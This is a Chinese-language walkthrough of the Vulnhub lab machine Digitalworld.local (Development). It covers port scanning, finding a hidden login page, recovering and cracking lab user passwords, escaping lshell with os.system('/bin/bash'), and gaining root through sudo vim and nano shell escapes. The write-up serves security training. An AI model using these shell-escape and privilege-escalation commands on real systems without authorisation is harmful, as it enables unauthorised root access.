当前位置: 首页 > article >正文

Vulnhub:Digitalworld.local (Development)靶机

article 2024/9/16 20:32:11

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

 

查看网站首页源码

 

访问development目录,提示存在一个流量包

 

查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php

 

访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错

 

根据报错搜索关键字

 

在exp中提示通过访问slog_users.txt获取敏感信息

 

 

md5解密

intern | 12345678900987654321
patrick | P@ssw0rd25
qiu | qiu

使用intern用户登录目标

 

lshell绕过

echo os.system('/bin/bash')

 

提权

使用之前得到的密码,切换到patrick用户查看sudo权限

 

vim提权

提权方法:vim | GTFOBins

 

sudo -u root vim -c ':!/bin/bash'

 

nano提权

提权方法:nano | GTFOBins

 

sudo -u root nano
^R^X
reset; sh 1>&0 2>&0

运行nano后,键盘ctrl+r

 

ctrl+x

 

输入命令:reset; sh 1>&0 2>&0,后回车

 

 


http://www.kler.cn/news/10349.html

相关文章:

  • C++ 23 实用工具(二)绑定工具
  • 10.字符串
  • 学习机器人SLAM导航核心技术(一)
  • 网络之广播域和冲突域
  • Qt5.12实战之规则DLL导出函数使用
  • 什么是分布式锁
  • 软考第二章 数据通信基础
  • 写博客8年与人生第一个502万
  • 空间复杂度
  • Makefile第十课:Makefile编译
  • 当你觉得生活快熬不下去时,请你读一读《活着》
  • Elastic Enterprise Search 8.7:新连接器、网络爬虫提取规则和搜索分析客户端测试版
  • Golang数据类型比较
  • MongoDB
  • 使用 ArcGIS Pro 进行土地利用分类的机器学习和深度学习
  • SpringBoot常见的的面试点
  • ArrayList、LinkedList与Vector的区别?
  • 【自用】HTML笔记
  • VS Code 快捷键
  • 【C++11那些事儿(一)】
  • pandas读取Excel核心源码剖析,面向过程仿openpyxl源码实现Excel数据加载
  • 【RabbitMQ】
  • MATLAB算法实战应用案例精讲-【深度学习】多尺度特征融合(论文篇一)
  • Java知识点学习(第13天)
  • springboot零基础到项目实战
  • UI学习路线图2023完整版(适合自学)
  • 使用git log统计代码行数
  • 【K8S系列】深入解析无状态服务
  • 文件访问被拒绝?5个解决方法!
  • 云原生周刊:一文读懂 Pod 网络 | 2023.4.10